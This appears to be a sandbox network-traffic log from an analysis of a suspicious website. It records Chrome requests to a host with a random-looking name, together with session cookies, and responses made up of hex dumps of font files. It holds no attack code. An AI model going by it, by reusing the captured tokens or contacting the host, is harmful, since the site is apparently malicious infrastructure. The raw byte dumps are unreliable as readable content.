                                                              2024-07-03 07:41:05 UTC742INData Raw: 77 4f 46 32 00 01 00 00 00 00 6d 60 00 10 00 00 00 01 24 08 00 00 6c fd 00 01 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 81 9d 36 1c 89 16 06 60 00 8e 3c 08 3c 09 97 62 11 08 0a 82 bb 24 82 9c 7f 01 36 02 24 03 8e 78 0b 87 3e 00 04 20 05 8c 03 07 97 7b 0c 81 0d 5b 09 10 71 05 6b b7 5d 5d 4f 88 db 06 10 73 b3 fd a9 7c 99 02 6e 8c 9b c7 21 18 d6 5b 3c 3b 10 83 ee e0 50 26 a6 cf 67 ff ff ff bf 21 a9 c8 98 49 27 69 b7 0d 51 01 44 50 d5 df 9f c4 1e 39 02 92 4a a0 06 b7 80 17 c1 39 47 eb 95 e9 98 51 31 28 8b f2 29 4a 6e c6 19 d5 d4 c5 d4 38 59 f3 d2 1b f9 1a 98 29 4a ce 46 0e 63 20 41 96 af 37 6b ab 76 b3 8b e9 32 3d a1 5a ee 6e fa 34 60 12 ed 81 a0 c0 7e 4e 6c a4 81 ef 34 3b aa 91 07 53 f6 6c 7b 77 c7 c7 3a ae 23 d5 ee aa 3d 21 bc 20
                                                              Data Ascii: wOF2m`$lB6`<<b$6$x> {[qk]]Os|n![<;P&g!I'iQDP9J9GQ1()Jn8Y)JFc A7kv2=Zn4`~Nl4;Sl{w:#=!
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 78 fd fb cf db e5 9f fb 06 4b 68 b0 50 00 7c 22 4d 93 ae 4a 51 a6 00 02 1a e0 df 3f 60 01 fc 53 40 7b df ed 6f 97 f6 52 6a 43 45 a1 71 78 8f 70 92 21 28 57 69 9f a4 1b eb 64 59 b5 25 ff 2f 72 f2 23 13 70 04 e7 43 20 15 c4 93 e2 e9 00 00 81 82 83 f3 72 1e 6f 34 50 f1 7d e4 e6 7f 33 58 92 99 5d 88 fc f3 a2 d4 ae 01 36 f2 9e 27 7e 26 b0 d3 c0 5d b7 b4 a7 2a 79 09 f4 8f b6 ff 59 51 82 a7 39 e1 22 76 b7 c3 17 cb 33 f0 af 90 a0 d9 6f 45 4d 51 6f 57 4d 16 57 60 cc 85 de 1f 9a 8a 01 13 c4 07 db cc a4 0e 94 94 10 82 59 08 56 81 8a 4f 32 11 7f ee f1 f8 f4 6c 83 02 c7 ac 9d 70 01 31 87 f4 42 a5 c2 bf 46 6e 0e 7f 6f 10 3c d0 ab a8 2c 43 8f f7 0f fd 97 f8 5e c0 59 e6 43 00 b6 fe 57 ae e9 b6 74 58 e2 11 7c a8 60 d2 a6 bc 97 35 3a f7 59 64 40 5d e5 12 6a 18 bb 24 b6 dc
                                                              Data Ascii: xKhP|"MJQ?`S@{oRjCEqxp!(WidY%/r#pC ro4P}3X]6'~&]*yYQ9"v3oEMQoWMW`YVO2lp1BFno<,C^YCWtX|`5:Yd@]j$
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 01 24 1a 4e 4a ad 68 65 68 64 9a cf 32 9d 4d e7 8a 0a 96 48 c8 6c 22 d8 b5 a2 1b ed 62 bc b1 36 52 21 05 95 14 c7 81 94 35 dc bc 61 7e c1 b4 7a 90 11 b4 ca 1d 10 b9 22 0a 08 40 c0 9b 31 90 dc 27 05 17 40 40 05 00 50 85 55 b6 46 4e 76 17 a1 cf f8 91 28 18 bc 86 dd 28 8a 0d 6e 1d 26 6e 7d 95 e8 90 58 8c 91 02 38 4a a0 94 87 e5 5a 50 e2 4c bc d0 25 06 2b 80 8c c4 05 99 9c 71 86 d8 29 ca 83 fb a6 88 8f df 77 45 f5 08 aa 72 b3 dd 04 90 49 e7 01 a0 73 40 15 14 14 29 cb f1 82 58 04 82 31 5a 02 29 dc 92 31 91 53 51 02 a6 fa 29 2a 80 d8 45 b8 e5 49 0f 90 d8 00 4a f9 09 a8 6e 75 4c 81 89 2f 00 77 7d b0 d2 75 b4 ea 9a ae 67 98 3e 3c 14 be 13 55 48 55 f9 1e 60 2e ed fc 69 cf da b5 42 06 20 96 20 07 60 a8 05 c2 4c f9 e3 9b e0 38 ab d1 83 9b 3a 8b 85 5e ca a3 dc 75 85
                                                              Data Ascii: $NJhehd2MHl"b6R!5a~z"@1'@@PUFNv((n&n}X8JZPL%+q)wErIs@)X1Z)1SQ)*EIJnuL/w}ug><UHU`.iB `L8:^u
                                                              2024-07-03 07:41:05 UTC1369INData Raw: df 29 84 2f 8d 21 bc 9b c0 9e 39 aa 76 68 dd 8c 5b 2f 6b 9f 1d b3 c9 cf 85 80 7e 4d 7d 1c 44 b5 56 8e d5 c6 7d 25 c4 02 3b 1b 15 6b 50 8d 7e cb ba 24 26 a5 bb 63 d1 11 53 27 2b df 09 8c 31 2c f4 05 2d 8e 9d 58 08 42 45 de 45 e3 4e a2 83 07 5d cd 4a 33 e0 b5 97 e1 ae c5 ad d6 f0 84 e2 b0 3c c6 03 e7 41 3f 7a 78 70 cc 8c 76 2e 02 cf b0 85 b1 bb 8b 6f c8 80 02 d5 9e 4a 0a a0 e3 4b b7 9b 9f c2 a6 10 af 98 9a 67 7a 8f e4 ad 45 d1 58 cc 2e ad 55 97 e2 39 c3 32 ea cd 24 ff 27 7b 73 5b b5 87 25 e3 73 aa 4d 39 f0 18 1c e6 1b 82 af d3 ba d2 3c 76 ce 79 bf b0 50 9d c3 58 69 34 3f af 43 4d 37 3b 6c 0d ce 6f 77 95 ec 53 d8 54 86 b1 6d 91 2a 74 76 a0 4a b1 bf 18 8f 94 7e cf d7 cf f4 a0 5e 55 14 0e 79 da 72 32 2d 41 57 0e 69 b4 3f 77 7c c5 7f e3 8f 3f 86 9b ff 3b dd 9e
                                                              Data Ascii: )/!9vh[/k~M}DV}%;kP~$&cS'+1,-XBEEN]J3<A?zxpv.oJKgzEX.U92$'{s[%sM9<vyPXi4?CM7;lowSTm*tvJ~^Uyr2-AWi?w|?;
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 09 ae 2d cf 99 80 54 9b eb 9f 00 6a 07 4d d1 ff 28 8b fc 6c d2 51 9d 0e 83 9d 22 5c e7 48 fc 92 05 99 2d cc c3 68 90 eb c1 5c 1c b1 24 18 71 2e 08 a3 6c db c7 5b cb 58 47 63 ba 7c 3d 91 9d bf 11 44 11 fd a1 6b 70 7b ee c6 de 50 49 44 db ef aa dc 2c 43 d6 77 cc 1f aa ac 43 7b cb 87 68 e6 c2 24 ef 71 39 38 ea ca 50 a1 dd a1 b9 16 af e7 5b 36 1a a3 68 7d b7 d1 9b 19 9e 1c 5e da b3 75 d6 19 24 b3 60 d0 95 e7 b7 0d b0 2c 6e a1 9e a0 81 cf 5d 0e 63 53 f1 46 00 2f bb fe 1f 70 a5 9e 58 1d 8b e9 75 3b 36 ba 42 6c 18 29 19 db c5 7e 29 4e 35 47 ef 03 d3 11 c4 6b cc 5c b2 8c 98 87 f1 b4 13 7a 4a eb 68 53 1d d1 cd 11 38 50 f8 a2 27 ad a6 67 78 4b 59 17 a6 07 71 e0 18 1c 10 0b 1d 4d 5f a1 68 c3 41 66 ce 84 77 dd 8c a7 e9 0d 2d 3e d3 90 90 f7 e2 a7 6d b2 50 7a fd 83 9e
                                                              Data Ascii: -TjM(lQ"\H-h\$q.l[XGc|=Dkp{PID,CwC{h$q98P[6h}^u$`,n]cSF/pXu;6Bl)~)N5Gk\zJhS8P'gxKYqM_hAfw->mPz
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 95 be 39 e2 c8 e7 ed 03 c0 64 f5 67 15 d4 4b a0 1c 83 ae 60 ec ae 01 51 24 52 a8 17 ec d7 e5 02 86 d6 f7 93 a3 02 4c fd 08 2e 8c 51 67 00 58 f0 b7 dd 29 00 ab bc b1 63 95 3a c0 e5 1b 8e 84 eb 18 37 bb ef 5b d7 78 fc 7d eb 19 6f bf 0f 7d 63 b3 00 00 20 24 28 4c 1c 20 c3 ee 31 20 a1 ae 01 e7 67 65 60 3c ab 00 96 58 09 ac 4a bb 44 03 43 dd 38 d9 f3 a2 2b cd a5 b3 5c 2d 6b ac c0 93 b0 6f fd 3a 04 fd 22 2e c2 be 55 37 a0 58 93 20 c4 cf 40 e9 fe 01 ff a3 bf 02 54 df f1 8b 37 d2 18 b9 b2 03 8d 66 21 96 60 25 57 88 a6 3f f3 e8 ee 9c 1a f8 ec 5f 95 a3 57 af 34 dc c0 f6 14 72 54 dc 81 7e 73 3e 7a 37 c6 fa dd 84 b2 82 b7 a0 7a 70 7b fd bf 42 d0 4f eb 28 a4 30 55 01 23 24 61 8a 97 2a 35 0e da f7 f4 cd 10 22 2c 42 aa 28 31 81 9a 39 89 24 32 0a 29 54 d2 64 c9 91 a7 40
                                                              Data Ascii: 9dgK`Q$RL.QgX)c:7[x}o}c $(L 1 ge`<XJDC8+\-ko:".U7X @T7f!`%W?_W4rT~s>z7zp{BO(0U#$a*5",B(19$2)Td@
                                                              2024-07-03 07:41:05 UTC1369INData Raw: dc 33 af 7c b3 6d 8b 0c 04 3f 40 60 4f 3c e0 20 be 10 e4 01 3d a8 7d a6 28 9b 38 a1 c5 64 57 74 3d ec 7f 7d 08 26 bd 16 95 ea 5b 16 b0 5d d2 de b5 6e b9 e3 ae 7b 6e 6b 72 28 f0 1d 1b 15 eb 74 db 4d 9d ae bb 2f 4e a5 f6 c0 61 4c 1d c7 6e b4 0c 4d bd 43 5d 9c ee 65 37 b8 ea ff 8d 8b ca 96 bb eb 56 d5 5a 4d 90 d4 e4 b5 76 87 e4 8d 45 7d 9a 48 7b 15 e0 5a c2 73 b4 ee 2e be 04 f8 b4 7e c7 da 3d f4 f5 ed 7a 5a 3f ac 25 b2 36 32 5a f6 5f c0 4a 1d ff a4 c9 f4 bf f6 4f f8 3a c0 5c 92 fa 51 9c be bf bc 3e 88 6f 28 0a 9c e4 45 91 5e ff 83 f9 e0 35 e2 f6 53 a6 99 64 a7 9e 68 3c 39 c1 74 f8 af 2d f4 6b e8 e9 d0 0e 42 8c e0 02 a8 36 9f 40 50 6b 72 08 44 df 89 c3 a0 23 f1 be 82 8f 9f a6 6c c8 ea e2 70 81 d8 e7 08 a7 65 e7 73 8e 16 c3 78 1e d8 5f dd 27 48 e7 20 ba 7f 9a
                                                              Data Ascii: 3|m?@`O< =}(8dWt=}&[]n{nkr(tM/NaLnMC]e7VZMvE}H{Zs.~=zZ?%62Z_JO:\Q>o(E^5Sdh<9t-kB6@PkrD#lpesx_'H
                                                              2024-07-03 07:41:05 UTC1369INData Raw: bf cd 85 bf 53 bf e2 c7 1c f6 cf 7b e2 5f aa f0 6f 0a fc 99 a3 fe 7b 4f fc 4f 15 fe 4f f1 7a c1 4f 5d c3 5e e8 fa 49 b7 d0 0e 70 d3 ad 1f fb c9 d3 33 05 10 1c 9c 8f f4 d8 f9 ab 65 5f 2e 9e fa 31 5c 0f 80 47 2e 03 e8 af 1b ab 78 90 19 8c 5c 3d 16 50 9e 10 aa b7 bb f1 96 e9 e8 50 5a 57 99 89 cb 42 8c 4f a5 c6 83 b0 72 71 d2 e9 5c 2c 8d e9 08 ac 4c 5d e9 e1 2a 2c 52 ba 08 9f 4a 8e 07 a1 28 86 32 a7 dd c8 b8 a8 8b 07 a7 74 ba 73 43 a8 e0 ea ca f2 67 58 b7 fe e2 8b 5d 0d dd c5 61 5a 55 59 9a 0f cd a5 7c b3 55 ed 6b 08 d9 3e 2e e8 14 eb a1 c6 2d 23 31 06 d3 5c 07 73 91 a5 48 f6 10 c2 65 09 59 44 d5 32 9e c2 c0 67 88 49 29 63 f6 60 86 66 ae f7 aa d0 58 94 7c 06 f4 ab 58 8e d0 72 36 8b 19 fb d1 96 1d 44 50 d7 90 6d 47 b6 20 cc 83 76 4d b5 21 b9 79 ec 7d 89 41 6e
                                                              Data Ascii: S{_o{OOOzO]^Ip3e_.1\G.x\=PPZWBOrq\,L]*,RJ(2tsCgX]aZUY|Uk>.-#1\sHeYD2gI)c`fX|Xr6DPmG vM!y}An
                                                              2024-07-03 07:41:05 UTC1369INData Raw: a8 65 12 04 2e 4d eb 35 d1 e1 80 1c 69 5d bf cc a1 e8 ac ef 3b f9 0a 24 ed 13 15 ac 4d 28 6d ea 7c 96 81 ad 6b 76 cb f2 ea 9a 98 e8 b3 84 7a ce d7 ad d3 1a f7 5d b8 96 7f e0 ef fb 3e d2 ff 10 71 be 45 2d 8d b5 93 2a 9f 2a fe 87 98 cc f7 1a 0f e6 a6 af f9 2b 26 34 d7 d6 39 10 09 be 2e 9e f0 d4 8e 33 b4 8b 19 e5 a9 9d 73 66 58 9e dc dc f7 04 ae e0 53 fd d4 74 7f cd 9a 76 7c 53 74 7a b8 41 07 9a 43 e8 66 29 ea 9d 9e 9c 9f 60 5e dc a2 67 a2 89 2e 8a 3d 6a 11 03 df b2 c3 35 2d db bf 54 8e 2c e8 63 02 b6 b6 82 1f 1e 48 3c 04 3a 4d 54 d0 ba 1b 7f cf 00 55 2a 7c 3c 7a f7 c0 a9 d4 3c 3a e4 66 3e 91 cb 46 cd d4 3b 3d 5e 7c 75 77 09 fc 80 de 6b 83 b1 31 20 03 f7 52 5b 17 79 79 fc fa e3 c7 fe 67 66 0b 87 1e ce e4 67 4f 5f 86 a5 da ce f5 c1 0b 83 57 1e 81 d4 75 41 77
                                                              Data Ascii: e.M5i];$M(m|kvz]>qE-**+&49.3sfXStv|StzACf)`^g.=j5-T,cH<:MTU*|<z<:f>F;=^|uwk1 R[yygfgO_WuAw
                                                              2024-07-03 07:41:05 UTC1369INData Raw: dc 03 f9 3b 07 e6 8f 03 0a 13 5b 7c 11 96 dd 39 50 c7 5c e8 b6 f3 ef e1 f8 f4 af 76 d7 04 6c a5 5b 5e a5 1f 82 e5 c8 48 75 02 05 a3 99 05 4b 0b cf 39 99 9b 44 e9 29 d2 4f e0 4d 76 5e eb d9 c9 2a 51 3c d3 98 aa 7e 11 1f 98 ae d2 2b d3 a4 f9 9a 0c b7 3d 84 70 b2 dd be ff 15 fd d3 ca ed c7 5a e4 3b 4f 4d 7e fe de f7 38 7c 59 78 f5 45 72 48 c9 b4 a5 47 d1 4f d6 15 62 27 b3 8b 70 d3 fa a2 3e a2 bc 65 ae 08 dd f4 4c 26 b8 0e bb 11 81 6e 8c ee b3 4e 29 73 93 b2 4d 47 db 14 36 f3 fd ef 69 4c 75 77 3d d1 4d 84 97 19 e8 a7 6b fe ff f9 e1 fa fd 4c a2 2c c7 1e 8d a7 96 3f 2a d7 8f 3f 1f 03 bf fd da ba fb e8 7b 75 c5 a3 0a fe 9a ef 16 b0 ec ef b4 ce b9 94 ed 47 9b 64 db 4f 4d ac 65 d4 fc 88 ba 28 3c ff 22 39 a2 6a b1 ac 41 de 47 d1 17 e3 ce e4 66 86 cf a8 ea 07 b9 46
                                                              Data Ascii: ;[|9P\vl[^HuK9D)OMv^*Q<~+=pZ;OM~8|YxErHGOb'p>eL&nN)sMG6iLuw=MkL,?*?{uGdOMe(<"9jAGfF


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              41192.168.2.662920188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:05 UTC1391OUTGET /yzBt71gp856BSdkJ4Qop47 HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              Origin: https://vkwek.ckyucle.com
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: */*
                                                              Sec-Fetch-Site: same-origin
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: font
                                                              Referer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:05 UTC622INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:05 GMT
                                                              Content-Type: font/woff
                                                              Content-Length: 35970
                                                              Connection: close
                                                              Content-Disposition: inline; filename="yzBt71gp856BSdkJ4Qop47"
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BTSTFqW49FvT%2FeW%2FSPAnmkZVS0uSsbJ%2FqLfxqoUSODEFqEmxf%2F0ShNtNL%2FkDkWWD1RGnk6wZNRc1DfQE4pRGyHBHOTkIEaVQxOsDIRFIktp%2FyKgWbtYhcABeQTaYwA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b2cefae42cc-EWR
                                                              2024-07-03 07:41:05 UTC747INData Raw: 77 4f 46 46 00 01 00 00 00 00 8c 82 00 11 00 00 00 01 24 20 00 01 00 00 00 00 8b 5c 00 00 01 26 00 00 02 93 00 00 00 00 00 00 00 00 44 53 49 47 00 00 8b 54 00 00 00 08 00 00 00 08 00 00 00 01 47 50 4f 53 00 00 01 80 00 00 17 df 00 00 4e b6 ed 42 8f b9 47 53 55 42 00 00 19 60 00 00 02 ad 00 00 04 96 8c 33 79 b9 4f 53 2f 32 00 00 1c 10 00 00 00 46 00 00 00 60 69 c3 7b 5b 63 6d 61 70 00 00 1c 58 00 00 05 1a 00 00 07 3c 97 3f 2b 12 63 76 74 20 00 00 84 dc 00 00 00 2f 00 00 00 3c 29 81 01 c0 66 70 67 6d 00 00 85 0c 00 00 05 c1 00 00 0b e2 3f ae 1b 9f 67 61 73 70 00 00 84 d4 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 21 74 00 00 52 61 00 00 9d a4 24 e0 b2 69 68 65 61 64 00 00 73 d8 00 00 00 33 00 00 00 36 1b 16 7d b8 68 68 65 61 00 00 74 0c 00 00 00
                                                              Data Ascii: wOFF$ \&DSIGTGPOSNBGSUB`3yOS/2F`i{[cmapX<?+cvt /<)fpgm?gaspglyf!tRa$iheads36}hheat
                                                              2024-07-03 07:41:05 UTC1369INData Raw: a7 02 da 41 45 b4 8b f6 d2 01 fa 90 4a e8 10 1d a6 06 6a e2 04 f6 b2 8f bb 71 26 5f c6 d7 f2 60 be 81 87 f0 50 be 91 87 f1 4d 3c 9c 6f e6 5b f8 56 1e c1 b7 f1 48 1e cb 53 78 3a cf e0 99 3c 8b 67 f3 1c 9e cb f3 78 3e 2f e0 85 bc 88 17 f3 12 5e ca cb 78 39 af e0 95 bc 8a 57 73 2e e7 f1 26 de ca 85 bc 93 8b 78 0f 17 13 f3 6a 55 4a a9 94 ae 42 d4 53 9d a7 1c 32 28 5f b5 d0 01 55 c7 d3 d5 51 9e a1 82 3c 87 e2 79 ae 6a e6 79 d8 e7 ab f3 bc 50 85 78 b1 3a c5 cb d0 b6 02 6d 2b b1 af 56 d5 fc 8a aa e5 35 68 5b 8b 7e 45 b8 57 4c dd e8 72 70 c0 07 1e f8 30 ea 19 2a 50 75 18 f9 24 4f 41 af e9 94 86 d1 b7 f1 4c 4a e1 59 e4 e5 d9 e4 e1 39 18 65 ae da 02 4c b5 c0 14 02 a6 20 2f 22 3f b0 6d e1 a5 94 08 8c 8d bc 1c bf 2b f0 cc 4a ec ab c8 00 e6 a3 9c ab 1a f8 15 ea 2a d8
                                                              Data Ascii: AEJjq&_`PM<o[VHSx:<gx>/^x9Ws.&xjUJBS2(_UQ<yjyPx:m+V5h[~EWLrp0*Pu$OALJY9eL /"?m+J*
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 35 de 74 d3 5e f4 39 ff 11 7a a1 e7 db 00 aa 6a 1d 19 56 5a 57 86 48 dc 00 97 0c cb df 06 44 32 47 d0 be cf d6 47 e1 40 dc f0 9f e8 bc ef e6 e4 11 eb e1 13 bf 8f ec f1 0c fa c6 ab 90 aa 27 03 73 ec a2 5a 00 90 2e ee 04 71 d6 a8 af e9 82 6f 6a bb 7a 16 de dd 07 09 27 ab 4f 54 b9 aa 55 cd aa 5a fd 45 2d 01 d5 75 ea b0 3a a3 3e a3 38 d5 a4 ce 83 de 7c d0 df 97 52 70 75 94 92 c0 9f d8 51 f9 02 a8 d4 bf 0d 42 5d 85 3a 41 99 ea 04 a8 1d 40 1e 50 59 8d a6 7b cc dc 9e fc 2d 41 9c 5d 4e 7e e1 ae 81 59 7d 09 c9 c5 66 eb 02 ac d5 ea 24 f2 9c 78 a1 06 76 01 ed 20 75 4a f3 4a 73 10 96 d3 c5 99 53 50 7e d2 e5 2c 1e 67 be 18 f1 f2 a0 3a 07 1a 6b d4 11 70 26 01 60 40 f6 04 e9 96 a1 d1 83 3c d3 03 30 a4 9e 21 58 2e b9 e8 f5 4a d5 14 1b 2a b7 a9 57 21 b7 4c 00 a9 f7 14 b2
                                                              Data Ascii: 5t^9zjVZWHD2GG@'sZ.qojz'OTUZE-u:>8|RpuQB]:A@PY{-A]N~Y}f$xv uJJsSP~,g:kp&`@<0!X.J*W!L
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 5a 7d ac de 52 27 f5 1a 9c 39 86 da a5 f6 aa 77 20 cb 62 68 0f 34 06 da 9b 6d cb 57 8e 1f aa b3 6a 87 ab 1a 2d 95 b7 c3 cd ea 20 ec e4 20 e4 58 62 d2 a1 73 2d f1 c6 01 8c ad b5 af 0c 39 56 10 ed a5 c0 9e 8a b3 24 f8 b3 0c f5 67 3c dd 1c d1 67 f8 61 5f 6f 80 8a a5 f0 7d 7e b1 da 06 f4 6d c1 dd 15 e4 87 9e 7f a2 df d2 6b 3f 0a 7c 59 82 eb 55 1a 8e e3 93 ba 16 47 b5 11 ef f0 ef 6d 8b 2b d5 ea 7e 3c b9 4e 7f c7 25 1e 2d e8 5a 17 09 60 fe 86 9a a4 72 25 2f e8 02 2b db 4d 37 e8 55 27 f5 38 65 ab 0f 1d 9a da 48 4c 4b 16 fe e6 a4 da 6f 71 df a0 ae 62 b9 65 ed bf c4 41 e5 d1 d0 46 b6 ae f5 10 75 5c 1d 06 cf fc a6 15 68 2a ac 9c da bd 26 1f f6 56 49 be c2 33 cf f4 db d8 52 bd 9e a6 69 8f 20 71 d3 03 9d 50 07 1c 1f 60 98 39 7c c4 bc 3e 14 3d d2 60 a6 15 ad 96 20 b3
                                                              Data Ascii: Z}R'9w bh4mWj- Xbs-9V$g<ga_o}~mk?|YUGm+~<N%-Z`r%/+M7U'8eHLKoqbeAFu\h*&VI3Ri qP`9|>=`
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 08 29 71 c1 88 90 33 d7 58 35 64 95 ce b7 a1 21 51 be 30 47 2d b2 0e b5 9e 1d 15 6d 0b c8 96 da fa a0 ca c3 08 65 c8 4a c2 22 b7 ca 90 fe 55 ad b1 5d 3d d7 69 66 d6 59 bb ac 92 9b df 5d b4 59 47 5b a0 d6 a0 36 4b 32 2b 43 f5 17 b3 12 b6 f2 f1 06 e4 bd 46 ab 26 29 ed db 72 c8 f9 8e 27 7c d5 c0 f4 66 7f a5 04 5d b9 a5 ae 07 5d 54 ee 76 a8 3c aa ab 4e c9 d2 8a a4 2a d8 25 df fe 6b 5b 14 2a 5b 9a db fb 4b 97 75 75 4a 65 c4 dc dd 6b 7f c9 2f b5 48 99 53 57 d5 44 fb 7b 1c d4 1d 75 f0 0b a9 e2 ef b2 91 c5 37 80 af c9 ad ef 99 d5 fd 12 21 b2 25 f3 31 35 2c 45 de c5 d4 c9 93 a6 8e a5 09 bf 33 44 e7 bc f2 05 6a 36 20 00 d0 35 76 26 ee 24 8a a7 e9 2f f4 18 f0 41 b5 c0 14 14 2d 0d e8 15 76 e9 d5 5a d5 d6 45 58 cb 6c b1 fc 66 8b 95 ed 35 c3 fb b5 56 22 f1 ae 1c b8 d6
                                                              Data Ascii: )q3X5d!Q0G-meJ"U]=ifY]YG[6K2+CF&)r'|f]]Tv<N*%k[*[KuuJek/HSWD{u7!%15,E3Dj6 5v&$/A-vZEXlf5V"
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 7c 3b 8f a6 4b f8 4e be 87 02 3c 86 c7 51 26 a2 09 ec 14 f1 e4 e7 d4 83 a7 f0 14 1a c8 53 79 2a f5 e6 a7 f8 29 4a e2 5f f0 2f 70 fe 34 3f 8d f3 5f f2 7f a2 cf 34 9e 46 5d f9 57 fc 2b 4a e3 67 f8 19 9c ff 9a 7f 8d f3 e9 3c 9d ae e1 19 3c 83 46 f1 4c 9e 49 f7 f0 2c 9e 45 63 78 36 cf a6 2b 79 0e cf a1 7e 88 59 cf 92 0f 51 eb 79 1c e7 f2 5c 1a cd f3 78 1e 0d e0 f9 3c 9f 46 f0 0b fc 5f d4 8d 17 f0 02 1a cc 0b 79 21 dd c0 8b 78 11 dd c6 8b 79 31 8d 44 a4 5b 42 b7 f0 52 5e 4a b7 f2 4b fc 12 8d 47 c4 5b 46 fd 79 39 2f a7 6b 79 05 af a0 eb 78 25 af a4 eb 11 07 57 d1 55 bc 9a 57 eb ff 3b c4 b9 74 35 ff 96 5f a6 cb 10 19 5f a1 3b 78 0d af a1 9b 74 84 a4 e1 3a 42 d2 5d 88 90 9b e8 76 44 c9 cd 74 b3 8e 93 94 a1 63 23 28 dc c1 3b 70 dc c9 3b 69 18 a2 64 11 0d 42 9c dc
                                                              Data Ascii: |;KN<Q&Sy*)J_/p4?_4F]W+Jg<<FLI,Ecx6+y~YQy\x<F_y!xy1D[BR^JKG[Fy9/kyx%WUW;t5__;xt:B]vDtc#(;p;idB
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 4d 84 e2 4d a6 2f 86 58 3a f1 f7 51 07 8a 8e 96 dd 16 0d 2b 1a 54 94 04 e7 22 8a ea f2 9f 23 98 50 be 0e 0e a6 06 63 83 93 03 e7 82 04 ce 04 7e 0d 14 06 32 02 63 02 ab 8f 3f 75 fc 49 ff 01 7f be 7f 07 f8 73 fc ab fc cb fc 63 fd f1 fe f8 a3 95 4a 9e aa 38 27 ec 40 58 be 75 35 c5 8a 4c 9b 39 e5 af cd 65 0b 47 f9 98 13 7c ad 34 70 06 da 4c 76 52 9c f9 65 db 65 ab 93 e6 2c 71 32 9d 2c 67 8d 93 e3 6c 74 f2 9c 5d ce 1e 27 df 29 70 0e db de 61 e7 b8 f3 31 e7 1d 4e de 3f ea 6c 27 e7 cf 22 c4 ba f4 ae 36 6a b1 f6 e8 4d ad 52 8a 66 6b 9e 36 e9 39 4d d2 34 8d 53 82 86 6a 87 b6 6a a7 66 6a be 5e d5 58 bd a6 17 35 45 dd f5 ba c6 eb 0d 4d d4 0c 2d 51 86 d2 94 ae 09 ca d4 7d 5a a0 85 4a d4 7e a5 aa 9f b2 b4 59 3d d8 a7 95 4a 52 9c 16 69 8c 66 11 4d 1b da 9a 6b ae 31 f7
                                                              Data Ascii: MM/X:Q+T"#Pc~2c?uIscJ8'@Xu5L9eG|4pLvRee,q2,glt]')pa1N?l'"6jMRfk69M4Sjjfj^X5EM-Q}ZJ~Y=JRifMk1
